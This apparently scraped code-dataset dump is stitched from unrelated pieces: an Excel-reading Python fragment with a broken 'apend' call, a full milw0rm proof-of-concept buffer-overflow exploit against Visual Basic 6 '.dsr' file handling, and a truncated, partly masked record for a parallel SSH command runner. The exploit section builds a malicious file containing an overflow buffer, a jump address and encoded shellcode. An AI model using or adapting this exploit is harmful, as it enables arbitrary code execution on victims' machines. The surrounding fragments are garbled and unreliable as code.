"step-4": "import xdrlib, sys\nimport xlrd\n\n\ndef open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx'):\n try:\n data = xlrd.open_workbook('D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print(str(e))\n\n\ndef excel_table_byindex(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx',\n colnameindex=0, by_index=0):\n data = open_excel(file='D:\\\\基金公司\\\\数据库-制表符\\\\资产组合-基金公司维度.xlsx')\n table = data.sheets()[by_index]\n nrows = table.nrows\n ncols = table.ncols\n colnames = table.row_values(colnameindex)\n list = []\n for rownum in range(1, nrows):\n row = table.row_values(rownum)\n if row:\n app = {}\n for i in range(len(colnames)):\n app[colnames[i]] = row[i]\n list.apend(app)\n return list\n",
"step-5": "import xdrlib,sys\nimport xlrd\ndef open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx'):\n try:\n data=xlrd.open_workbook('D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')\n return data\n except Exception as e:\n print (str(e))\ndef excel_table_byindex(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx',colnameindex=0,by_index=0):\n data=open_excel(file='D:\\基金公司\\数据库-制表符\\资产组合-基金公司维度.xlsx')\n table=data.sheets()[by_index]\n nrows=table.nrows\n ncols=table.ncols\n colnames=table.row_values(colnameindex)\n list=[]\n for rownum in range(1,nrows):\n row=table.row_values(rownum)\n if row:\n app={}\n for i in range(len(colnames)):\n app[colnames[i]]=row[i]\n list.apend(app)\n return list\n\n\n\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#usage: exploit.py
print "-----------------------------------------------------------------------"
print ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 ".dsr" File Handling BoF\n'
print " author: shinnai"
print " mail: shinnai[at]autistici[dot]org"
print " site: http://shinnai.altervista.org\n"
print " Once you create the file, open it with Visual Basic 6 and click on"
print " command name."
print "-----------------------------------------------------------------------"
buff = "A" * 555
get_EIP = "\xFF\xBE\x3F\x7E" #call ESP from user32.dll
nop = "\x90" * 12
shellcode = (
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x34"
"\x42\x50\x42\x30\x42\x50\x4b\x38\x45\x44\x4e\x43\x4b\x38\x4e\x47"
"\x45\x30\x4a\x47\x41\x30\x4f\x4e\x4b\x48\x4f\x54\x4a\x41\x4b\x38"
"\x4f\x55\x42\x52\x41\x30\x4b\x4e\x49\x54\x4b\x48\x46\x33\x4b\x48"
"\x41\x50\x50\x4e\x41\x43\x42\x4c\x49\x59\x4e\x4a\x46\x48\x42\x4c"
"\x46\x47\x47\x50\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"
"\x46\x4f\x4b\x43\x46\x35\x46\x52\x46\x30\x45\x37\x45\x4e\x4b\x58"
"\x4f\x45\x46\x42\x41\x50\x4b\x4e\x48\x46\x4b\x48\x4e\x30\x4b\x44"
"\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x4b\x38\x4e\x51\x4b\x38"
"\x41\x50\x4b\x4e\x49\x38\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33"
"\x42\x4c\x46\x46\x4b\x48\x42\x34\x42\x33\x45\x38\x42\x4c\x4a\x47"
"\x4e\x30\x4b\x38\x42\x34\x4e\x50\x4b\x58\x42\x47\x4e\x41\x4d\x4a"
"\x4b\x58\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x48\x42\x48\x42\x4b"
"\x42\x30\x42\x50\x42\x30\x4b\x38\x4a\x56\x4e\x43\x4f\x55\x41\x33"
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x58\x42\x4c\x4b\x37"
"\x42\x55\x4a\x36\x42\x4f\x4c\x58\x46\x50\x4f\x35\x4a\x36\x4a\x59"
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x56\x41\x56"
"\x4e\x46\x43\x56\x50\x32\x45\x46\x4a\x37\x45\x36\x42\x50\x5a"
)
dsrfile = (
"VERSION 5.00\n"
"Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\n"
" ClientHeight = 6315\n"
" ClientLeft = 0\n"
" ClientTop = 0\n"
" ClientWidth = 7980\n"
" _ExtentX = 14076\n"
" _ExtentY = 11139\n"
" FolderFlags = 1\n"
' TypeLibGuid = "{D7133993-3B5A-4667-B63B-749EF16A1840}"\n'
' TypeInfoGuid = "{050E7898-66AC-4150-A213-47C7725D7E7E}"\n'
" TypeInfoCookie = 0\n"
" Version = 4\n"
" NumConnections = 1\n"
" BeginProperty Connection1\n"
' ConnectionName = "Connection1"\n'
" ConnDispId = 1001\n"
" SourceOfData = 3\n"
' ConnectionSource= ""\n'
" Expanded = -1 'True\n"
" QuoteChar = 96\n"
" SeparatorChar = 46\n"
" EndProperty\n"
" NumRecordsets = 1\n"
" BeginProperty Recordset1\n"
' CommandName = "Command1"\n'
" CommDispId = 1002\n"
" RsDispId = 1003\n"
' CommandText = "' + buff + get_EIP + nop + shellcode + nop + '"\n'
' ActiveConnectionName= "Connection1"\n'
" CommandType = 2\n"
" dbObjectType = 1\n"
" Locktype = 3\n"
" IsRSReturning = -1 'True\n"
" NumFields = 1\n"
" BeginProperty Field1\n"
" Precision = 10\n"
" Size = 4\n"
" Scale = 0\n"
" Type = 3\n"
' Name = "ID"\n'
' Caption = "ID"\n'
" EndProperty\n"
" NumGroups = 0\n"
" ParamCount = 0\n"
" RelationCount = 0\n"
" AggregateCount = 0\n"
" EndProperty\n"
"End\n"
'Attribute VB_Name = "DataEnvironment1"\n'
"Attribute VB_GlobalNameSpace = False\n"
"Attribute VB_Creatable = True\n"
"Attribute VB_PredeclaredId = True\n"
"Attribute VB_Exposed = False\n"
)
try:
out_file = open("DataEnvironment1.dsr",'w')
out_file.write(dsrfile)
out_file.close()
print "\nFILE CREATION COMPLETED!\n"
except:
print " \n -------------------------------------"
print " Usage: exploit.py"
print " -------------------------------------"
print "\nAN ERROR OCCURS DURING FILE CREATION!"
# milw0rm.com [2008-04-04]
|
normal
|
{
"blob_id": "40a73ceeeb310c490fe2467511966679a1afa92b",
"index": 9585,
"step-1": "#usage: exploit.py\n\nprint \"-----------------------------------------------------------------------\"\nprint ' [PoC 2] MS Visual Basic Enterprise Ed. 6 SP6 \".dsr\" File Handling BoF\\n'\nprint \" author: shinnai\"\nprint \" mail: shinnai[at]autistici[dot]org\"\nprint \" site: http://shinnai.altervista.org\\n\"\nprint \" Once you create the file, open it with Visual Basic 6 and click on\"\nprint \" command name.\"\nprint \"-----------------------------------------------------------------------\"\n\nbuff = \"A\" * 555\n\nget_EIP = \"\\xFF\\xBE\\x3F\\x7E\" #call ESP from user32.dll\n\nnop = \"\\x90\" * 12\n\nshellcode = (\n \"\\xeb\\x03\\x59\\xeb\\x05\\xe8\\xf8\\xff\\xff\\xff\\x4f\\x49\\x49\\x49\\x49\\x49\"\n \"\\x49\\x51\\x5a\\x56\\x54\\x58\\x36\\x33\\x30\\x56\\x58\\x34\\x41\\x30\\x42\\x36\"\n \"\\x48\\x48\\x30\\x42\\x33\\x30\\x42\\x43\\x56\\x58\\x32\\x42\\x44\\x42\\x48\\x34\"\n \"\\x41\\x32\\x41\\x44\\x30\\x41\\x44\\x54\\x42\\x44\\x51\\x42\\x30\\x41\\x44\\x41\"\n \"\\x56\\x58\\x34\\x5a\\x38\\x42\\x44\\x4a\\x4f\\x4d\\x4e\\x4f\\x4a\\x4e\\x46\\x34\"\n \"\\x42\\x50\\x42\\x30\\x42\\x50\\x4b\\x38\\x45\\x44\\x4e\\x43\\x4b\\x38\\x4e\\x47\"\n \"\\x45\\x30\\x4a\\x47\\x41\\x30\\x4f\\x4e\\x4b\\x48\\x4f\\x54\\x4a\\x41\\x4b\\x38\"\n \"\\x4f\\x55\\x42\\x52\\x41\\x30\\x4b\\x4e\\x49\\x54\\x4b\\x48\\x46\\x33\\x4b\\x48\"\n \"\\x41\\x50\\x50\\x4e\\x41\\x43\\x42\\x4c\\x49\\x59\\x4e\\x4a\\x46\\x48\\x42\\x4c\"\n \"\\x46\\x47\\x47\\x50\\x41\\x4c\\x4c\\x4c\\x4d\\x50\\x41\\x50\\x44\\x4c\\x4b\\x4e\"\n \"\\x46\\x4f\\x4b\\x43\\x46\\x35\\x46\\x52\\x46\\x30\\x45\\x37\\x45\\x4e\\x4b\\x58\"\n \"\\x4f\\x45\\x46\\x42\\x41\\x50\\x4b\\x4e\\x48\\x46\\x4b\\x48\\x4e\\x30\\x4b\\x44\"\n \"\\x4b\\x48\\x4f\\x35\\x4e\\x41\\x41\\x30\\x4b\\x4e\\x4b\\x38\\x4e\\x51\\x4b\\x38\"\n \"\\x41\\x50\\x4b\\x4e\\x49\\x38\\x4e\\x45\\x46\\x32\\x46\\x50\\x43\\x4c\\x41\\x33\"\n \"\\x42\\x4c\\x46\\x46\\x4b\\x48\\x42\\x34\\x42\\x33\\x45\\x38\\x42\\x4c\\x4a\\x47\"\n \"\\x4e\\x30\\x4b\\x38\\x42\\x34\\x4e\\x50\\x4b\\x58\\x42\\x47\\x4e\\x41\\x4d\\x4a\"\n \"\\x4b\\x58\\x4a\\x36\\x4a\\x30\\x4b\\x4e\\x49\\x50\\x4b\\x48\\x42\\x48\\x42\\x4b\"\n \"\\x42\\x30\\x42\\x50\\x42\\x30\\x4b\\x38\\x4a\\x56\\x4e\\x43\\x4f\\x55\\x41\\x33\"\n \"\\x48\\x4f\\x42\\x46\\x48\\x35\\x49\\x38\\x4a\\x4f\\x43\\x58\\x42\\x4c\\x4b\\x37\"\n \"\\x42\\x55\\x4a\\x36\\x42\\x4f\\x4c\\x58\\x46\\x50\\x4f\\x35\\x4a\\x36\\x4a\\x59\"\n \"\\x50\\x4f\\x4c\\x38\\x50\\x50\\x47\\x55\\x4f\\x4f\\x47\\x4e\\x43\\x56\\x41\\x56\"\n \"\\x4e\\x46\\x43\\x56\\x50\\x32\\x45\\x46\\x4a\\x37\\x45\\x36\\x42\\x50\\x5a\"\n )\n\ndsrfile = (\n \"VERSION 5.00\\n\"\n \"Begin {C0E45035-5775-11D0-B388-00A0C9055D8E} DataEnvironment1\\n\"\n \" ClientHeight = 6315\\n\"\n \" ClientLeft = 0\\n\"\n \" ClientTop = 0\\n\"\n \" ClientWidth = 7980\\n\"\n \" _ExtentX = 14076\\n\"\n \" _ExtentY = 11139\\n\"\n \" FolderFlags = 1\\n\"\n ' TypeLibGuid = \"{D7133993-3B5A-4667-B63B-749EF16A1840}\"\\n'\n ' TypeInfoGuid = \"{050E7898-66AC-4150-A213-47C7725D7E7E}\"\\n'\n \" TypeInfoCookie = 0\\n\"\n \" Version = 4\\n\"\n \" NumConnections = 1\\n\"\n \" BeginProperty Connection1\\n\"\n ' ConnectionName = \"Connection1\"\\n'\n \" ConnDispId = 1001\\n\"\n \" SourceOfData = 3\\n\"\n ' ConnectionSource= \"\"\\n'\n \" Expanded = -1 'True\\n\"\n \" QuoteChar = 96\\n\"\n \" SeparatorChar = 46\\n\"\n \" EndProperty\\n\"\n \" NumRecordsets = 1\\n\"\n \" BeginProperty Recordset1\\n\"\n ' CommandName = \"Command1\"\\n'\n \" CommDispId = 1002\\n\"\n \" RsDispId = 1003\\n\"\n ' CommandText = \"' + buff + get_EIP + nop + shellcode + nop + '\"\\n'\n ' ActiveConnectionName= \"Connection1\"\\n'\n \" CommandType = 2\\n\"\n \" dbObjectType = 1\\n\"\n \" Locktype = 3\\n\"\n \" IsRSReturning = -1 'True\\n\"\n \" NumFields = 1\\n\"\n \" BeginProperty Field1\\n\"\n \" Precision = 10\\n\"\n \" Size = 4\\n\"\n \" Scale = 0\\n\"\n \" Type = 3\\n\"\n ' Name = \"ID\"\\n'\n ' Caption = \"ID\"\\n'\n \" EndProperty\\n\"\n \" NumGroups = 0\\n\"\n \" ParamCount = 0\\n\"\n \" RelationCount = 0\\n\"\n \" AggregateCount = 0\\n\"\n \" EndProperty\\n\"\n \"End\\n\"\n 'Attribute VB_Name = \"DataEnvironment1\"\\n'\n \"Attribute VB_GlobalNameSpace = False\\n\"\n \"Attribute VB_Creatable = True\\n\"\n \"Attribute VB_PredeclaredId = True\\n\"\n \"Attribute VB_Exposed = False\\n\"\n )\n\ntry:\n out_file = open(\"DataEnvironment1.dsr\",'w')\n out_file.write(dsrfile)\n out_file.close()\n print \"\\nFILE CREATION COMPLETED!\\n\"\nexcept:\n print \" \\n -------------------------------------\"\n print \" Usage: exploit.py\"\n print \" -------------------------------------\"\n print \"\\nAN ERROR OCCURS DURING FILE CREATION!\"\n\n# milw0rm.com [2008-04-04]\n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
def worker(server, commands):
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
if session.ping == 'Alive':
session.connect()
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'
] = 'Error: the script location {} not exists'.format(
options.script)
print('Error: the script location {} not exists'.format
(options.script))
else:
curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = '/tmp/' + file,
session.execute(('/bin/chmod a+x /tmp/' + file,))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser.add_argument('-f', action='store', required=True, dest='file', help=
'servers list')
<|reserved_special_token_0|>
group.add_argument('-c', action='store', dest='commands', help=
'commands need to execute')
group.add_argument('-S', action='store', dest='script', help=
'local script which need to execute on remote servers')
<|reserved_special_token_0|>
if os.path.getsize(options.file) == 0:
print('Error: server list file is empty')
exit(2)
<|reserved_special_token_0|>
for line in file:
line = line.strip('\n')
if len(line) == 0 or line in servers:
continue
servers.append(line)
if not servers:
print('Error: server list file is empty')
exit(2)
<|reserved_special_token_0|>
if options.commands and re.match('[a-zA-Z0-9]', options.commands):
for item in options.commands.split(','):
item = item.replace('"', '')
commands.append(item)
if not commands:
print('Error: command list is empty')
parser.print_help()
exit(2)
if options.script:
commands = ['/tmp/' + os.path.basename(options.script)]
<|reserved_special_token_0|>
def worker(server, commands):
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
if session.ping == 'Alive':
session.connect()
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'
] = 'Error: the script location {} not exists'.format(
options.script)
print('Error: the script location {} not exists'.format
(options.script))
else:
curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = '/tmp/' + file,
session.execute(('/bin/chmod a+x /tmp/' + file,))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
<|reserved_special_token_0|>
while servers:
if len(mp.active_children()) < limits:
server = servers.pop()
proc = mp.Process(target=worker, args=(server, commands), name=server)
procs.append(proc)
proc.start()
while mp.active_children():
if not queue.empty():
item = queue.get()
if item['commands'] == 'Down':
print('Server: {} : Unable to ping'.format(item['server']))
continue
if type(item['commands']) != type(dict()):
print('Server: {} : {}'.format(item['server'], item['commands']))
continue
print('Server: {}'.format(item['server']))
for command in commands:
if item['commands'][command][0] != '':
if options.script:
print('Output of Command: {}'.format(options.script))
else:
print('Output of Command: {}'.format(command))
print(item['commands'][command][0])
if item['commands'][command][1] != '':
print('Error occurred on command: {}'.format(command))
print(item['commands'][command][1])
print(
'**************************************************************************'
)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
parser = argparse.ArgumentParser(description=
'Execute commands parallel on remote servers')
parser.add_argument('-f', action='store', required=True, dest='file', help=
'servers list')
group = parser.add_mutually_exclusive_group()
group.add_argument('-c', action='store', dest='commands', help=
'commands need to execute')
group.add_argument('-S', action='store', dest='script', help=
'local script which need to execute on remote servers')
options = parser.parse_args()
if os.path.getsize(options.file) == 0:
print('Error: server list file is empty')
exit(2)
file = open(options.file, 'r')
servers = []
for line in file:
line = line.strip('\n')
if len(line) == 0 or line in servers:
continue
servers.append(line)
if not servers:
print('Error: server list file is empty')
exit(2)
commands = []
if options.commands and re.match('[a-zA-Z0-9]', options.commands):
for item in options.commands.split(','):
item = item.replace('"', '')
commands.append(item)
if not commands:
print('Error: command list is empty')
parser.print_help()
exit(2)
if options.script:
commands = ['/tmp/' + os.path.basename(options.script)]
queue = mp.Queue()
def worker(server, commands):
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
if session.ping == 'Alive':
session.connect()
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'
] = 'Error: the script location {} not exists'.format(
options.script)
print('Error: the script location {} not exists'.format
(options.script))
else:
curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = '/tmp/' + file,
session.execute(('/bin/chmod a+x /tmp/' + file,))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
procs = []
limits = mp.cpu_count()
while servers:
if len(mp.active_children()) < limits:
server = servers.pop()
proc = mp.Process(target=worker, args=(server, commands), name=server)
procs.append(proc)
proc.start()
while mp.active_children():
if not queue.empty():
item = queue.get()
if item['commands'] == 'Down':
print('Server: {} : Unable to ping'.format(item['server']))
continue
if type(item['commands']) != type(dict()):
print('Server: {} : {}'.format(item['server'], item['commands']))
continue
print('Server: {}'.format(item['server']))
for command in commands:
if item['commands'][command][0] != '':
if options.script:
print('Output of Command: {}'.format(options.script))
else:
print('Output of Command: {}'.format(command))
print(item['commands'][command][0])
if item['commands'][command][1] != '':
print('Error occurred on command: {}'.format(command))
print(item['commands'][command][1])
print(
'**************************************************************************'
)
<|reserved_special_token_1|>
import sgc
import multiprocessing as mp
import argparse
import os
import re
parser = argparse.ArgumentParser(description=
'Execute commands parallel on remote servers')
parser.add_argument('-f', action='store', required=True, dest='file', help=
'servers list')
group = parser.add_mutually_exclusive_group()
group.add_argument('-c', action='store', dest='commands', help=
'commands need to execute')
group.add_argument('-S', action='store', dest='script', help=
'local script which need to execute on remote servers')
options = parser.parse_args()
if os.path.getsize(options.file) == 0:
print('Error: server list file is empty')
exit(2)
file = open(options.file, 'r')
servers = []
for line in file:
line = line.strip('\n')
if len(line) == 0 or line in servers:
continue
servers.append(line)
if not servers:
print('Error: server list file is empty')
exit(2)
commands = []
if options.commands and re.match('[a-zA-Z0-9]', options.commands):
for item in options.commands.split(','):
item = item.replace('"', '')
commands.append(item)
if not commands:
print('Error: command list is empty')
parser.print_help()
exit(2)
if options.script:
commands = ['/tmp/' + os.path.basename(options.script)]
queue = mp.Queue()
def worker(server, commands):
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
if session.ping == 'Alive':
session.connect()
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'
] = 'Error: the script location {} not exists'.format(
options.script)
print('Error: the script location {} not exists'.format
(options.script))
else:
curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = '/tmp/' + file,
session.execute(('/bin/chmod a+x /tmp/' + file,))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
procs = []
limits = mp.cpu_count()
while servers:
if len(mp.active_children()) < limits:
server = servers.pop()
proc = mp.Process(target=worker, args=(server, commands), name=server)
procs.append(proc)
proc.start()
while mp.active_children():
if not queue.empty():
item = queue.get()
if item['commands'] == 'Down':
print('Server: {} : Unable to ping'.format(item['server']))
continue
if type(item['commands']) != type(dict()):
print('Server: {} : {}'.format(item['server'], item['commands']))
continue
print('Server: {}'.format(item['server']))
for command in commands:
if item['commands'][command][0] != '':
if options.script:
print('Output of Command: {}'.format(options.script))
else:
print('Output of Command: {}'.format(command))
print(item['commands'][command][0])
if item['commands'][command][1] != '':
print('Error occurred on command: {}'.format(command))
print(item['commands'][command][1])
print(
'**************************************************************************'
)
<|reserved_special_token_1|>
import sgc
import multiprocessing as mp
# import json
import argparse
import os
import re
#Process argument passed to the script
parser = argparse.ArgumentParser(description='Execute commands parallel on remote servers')
parser.add_argument('-f', action='store', required=True, dest='file', help='servers list')
group = parser.add_mutually_exclusive_group()
group.add_argument('-c', action='store', dest='commands', help='commands need to execute')
group.add_argument('-S', action='store', dest='script', help='local script which need to execute on remote servers')
options = parser.parse_args()
#Exit if input file is zero
if os.path.getsize(options.file) == 0:
print("Error: server list file is empty")
exit(2)
#Process the input file and store the server in list variable servers
file = open(options.file, 'r')
servers = []
for line in file:
line = line.strip('\n')
if len(line) == 0 or line in servers:
continue
servers.append(line)
#Exit the script if the servers list is empty
if not servers:
print("Error: server list file is empty")
exit(2)
#Process the commands passed into the script
commands = []
if options.commands and re.match(r'[a-zA-Z0-9]', options.commands):
for item in options.commands.split(','):
item = item.replace('"', '')
commands.append(item)
#Exit the script if command list is empty
if not commands:
print("Error: command list is empty")
parser.print_help()
exit(2)
if options.script:
commands = ['/tmp/'+os.path.basename(options.script)]
#servers = ['localhost', 'centos6web', 'fedora.kannan.lab', '127.0.0.1', '127.0.0.2', '127.0.0.3', '127.0.0.4',
# '127.0.0.100', '127.0.0.200', '127.0.0.150', '127.0.0.10', '127.0.0.20', '127.0.0.30']
# servers = ['centos6web', 'fedora.kannan.lab']
# commands = ('sudo shutdown -h 0',)
# commands = ('uptime', 'uname -a', 'sudo fdisk -l')
queue = mp.Queue()
def worker(server, commands):
# print(mp.current_process().name)
output = {}
output['server'] = server
session = sgc.Ssh(server=server)
# print("Connected to server {}".format(server))
# else:
# print("Unable to connect to server {}\n{}".format(server, session.connection_error))
if session.ping == 'Alive':
session.connect()
# print(session.connection)
if session.connection == False:
output['commands'] = session.connection_error
else:
if options.script:
if not os.path.exists(options.script):
output['commands'] = "Error: the script location {} not exists".format(options.script)
print("Error: the script location {} not exists".format(options.script))
else:
curdir = os.getcwd()
folder, file = os.path.split(options.script)
if not folder:
folder = curdir
try:
os.chdir(folder)
sftp = session.Sftp()
sftp.chdir('/tmp')
sftp.put(file, file)
commands = ('/tmp/'+file,)
session.execute(('/bin/chmod a+x /tmp/'+file, ))
except Exception as error:
output['commands'] = error
output['commands'] = session.execute(commands)
else:
output['commands'] = 'Down'
queue.put(output)
# if output != None:
# print("Server {}".format(server))
# for key in output:
# print(key, output[key])
# pool = mp.Pool(processes=mp.cpu_count())
# result = pool.map_async(worker, servers)
# for item in result.get():
# print(json.dumps(item, indent=4))
procs = []
limits = mp.cpu_count()
while servers:
if len(mp.active_children()) < limits:
server = servers.pop()
proc = mp.Process(target=worker, args=(server, commands), name=server)
procs.append(proc)
proc.start()
while mp.active_children() :
if not queue.empty():
item = queue.get()
if item['commands'] == 'Down':
print("Server: {} : Unable to ping".format(item['server']))
continue
if type(item['commands']) != type(dict()):
print("Server: {} : {}".format(item['server'], item['commands']))
continue
print("Server: {}".format(item['server']))
for command in commands:
if item['commands'][command][0] != "":
if options.script:
print("Output of Command: {}".format(options.script))
else:
print("Output of Command: {}".format(command))
print(item['commands'][command][0])
if item['commands'][command][1] != "":
print("Error occurred on command: {}".format(command))
print(item['commands'][command][1])
print("**************************************************************************")
|
flexible
|
{
"blob_id": "ace7e5676fcb01c3542952eaacdada9963b8467a",
"index": 5168,
"step-1": "<mask token>\n\n\ndef worker(server, commands):\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n if session.ping == 'Alive':\n session.connect()\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'\n ] = 'Error: the script location {} not exists'.format(\n options.script)\n print('Error: the script location {} not exists'.format\n (options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = '/tmp/' + file,\n session.execute(('/bin/chmod a+x /tmp/' + file,))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n queue.put(output)\n\n\n<mask token>\n",
"step-2": "<mask token>\nparser.add_argument('-f', action='store', required=True, dest='file', help=\n 'servers list')\n<mask token>\ngroup.add_argument('-c', action='store', dest='commands', help=\n 'commands need to execute')\ngroup.add_argument('-S', action='store', dest='script', help=\n 'local script which need to execute on remote servers')\n<mask token>\nif os.path.getsize(options.file) == 0:\n print('Error: server list file is empty')\n exit(2)\n<mask token>\nfor line in file:\n line = line.strip('\\n')\n if len(line) == 0 or line in servers:\n continue\n servers.append(line)\nif not servers:\n print('Error: server list file is empty')\n exit(2)\n<mask token>\nif options.commands and re.match('[a-zA-Z0-9]', options.commands):\n for item in options.commands.split(','):\n item = item.replace('\"', '')\n commands.append(item)\n if not commands:\n print('Error: command list is empty')\n parser.print_help()\n exit(2)\nif options.script:\n commands = ['/tmp/' + os.path.basename(options.script)]\n<mask token>\n\n\ndef worker(server, commands):\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n if session.ping == 'Alive':\n session.connect()\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'\n ] = 'Error: the script location {} not exists'.format(\n options.script)\n print('Error: the script location {} not exists'.format\n (options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = '/tmp/' + file,\n session.execute(('/bin/chmod a+x /tmp/' + file,))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n queue.put(output)\n\n\n<mask token>\nwhile servers:\n if len(mp.active_children()) < limits:\n server = servers.pop()\n proc = mp.Process(target=worker, args=(server, commands), name=server)\n procs.append(proc)\n proc.start()\nwhile mp.active_children():\n if not queue.empty():\n item = queue.get()\n if item['commands'] == 'Down':\n print('Server: {} : Unable to ping'.format(item['server']))\n continue\n if type(item['commands']) != type(dict()):\n print('Server: {} : {}'.format(item['server'], item['commands']))\n continue\n print('Server: {}'.format(item['server']))\n for command in commands:\n if item['commands'][command][0] != '':\n if options.script:\n print('Output of Command: {}'.format(options.script))\n else:\n print('Output of Command: {}'.format(command))\n print(item['commands'][command][0])\n if item['commands'][command][1] != '':\n print('Error occurred on command: {}'.format(command))\n print(item['commands'][command][1])\n print(\n '**************************************************************************'\n )\n",
"step-3": "<mask token>\nparser = argparse.ArgumentParser(description=\n 'Execute commands parallel on remote servers')\nparser.add_argument('-f', action='store', required=True, dest='file', help=\n 'servers list')\ngroup = parser.add_mutually_exclusive_group()\ngroup.add_argument('-c', action='store', dest='commands', help=\n 'commands need to execute')\ngroup.add_argument('-S', action='store', dest='script', help=\n 'local script which need to execute on remote servers')\noptions = parser.parse_args()\nif os.path.getsize(options.file) == 0:\n print('Error: server list file is empty')\n exit(2)\nfile = open(options.file, 'r')\nservers = []\nfor line in file:\n line = line.strip('\\n')\n if len(line) == 0 or line in servers:\n continue\n servers.append(line)\nif not servers:\n print('Error: server list file is empty')\n exit(2)\ncommands = []\nif options.commands and re.match('[a-zA-Z0-9]', options.commands):\n for item in options.commands.split(','):\n item = item.replace('\"', '')\n commands.append(item)\n if not commands:\n print('Error: command list is empty')\n parser.print_help()\n exit(2)\nif options.script:\n commands = ['/tmp/' + os.path.basename(options.script)]\nqueue = mp.Queue()\n\n\ndef worker(server, commands):\n output = {}\n output['server'] = server\n session = sgc.Ssh(server=server)\n if session.ping == 'Alive':\n session.connect()\n if session.connection == False:\n output['commands'] = session.connection_error\n else:\n if options.script:\n if not os.path.exists(options.script):\n output['commands'\n ] = 'Error: the script location {} not exists'.format(\n options.script)\n print('Error: the script location {} not exists'.format\n (options.script))\n else:\n curdir = os.getcwd()\n folder, file = os.path.split(options.script)\n if not folder:\n folder = curdir\n try:\n os.chdir(folder)\n sftp = session.Sftp()\n sftp.chdir('/tmp')\n sftp.put(file, file)\n commands = '/tmp/' + file,\n session.execute(('/bin/chmod a+x /tmp/' + file,))\n except Exception as error:\n output['commands'] = error\n output['commands'] = session.execute(commands)\n else:\n output['commands'] = 'Down'\n queue.put(output)\n\n\nprocs = []\nlimits = mp.cpu_count()\nwhile servers:\n if len(mp.active_children()) < limits:\n server = servers.pop()\n proc = mp.Process(target=worker, args=(server, commands), name=server)\n procs.append(proc)\n proc.start()\nwhile mp.active_children():\n if not queue.empty():\n item = queue.get()\n if item['commands'] == 'Down':\n print('Server: {} : Unable to 